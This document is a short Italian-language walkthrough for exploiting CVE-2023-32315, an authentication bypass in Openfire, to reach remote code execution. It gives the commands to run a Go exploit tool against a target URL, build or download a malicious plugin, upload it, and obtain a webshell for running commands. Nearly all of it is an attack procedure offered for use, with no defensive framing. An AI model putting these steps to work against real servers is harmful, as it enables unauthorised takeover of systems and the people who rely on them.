
RCE
0x01 Ottieni JSESSIONID e csrftoken restituiti , costruisci un pacchetto di richiesta per aggiungere un utente (sostituisci JSESSIONID, csrftoken)

cd CVE-2023-32315-Openfire-Bypass/scan_all
go mod tidy
go run main.go -u http://openfire.com:9090
0x02 Compilazione e installazione del plugin
mvn clean package
o scaricare il plugin dalla sezione releases
0x03 Carica il plugin

0x04 Ottieni webshell
0x05 Esegui il comando
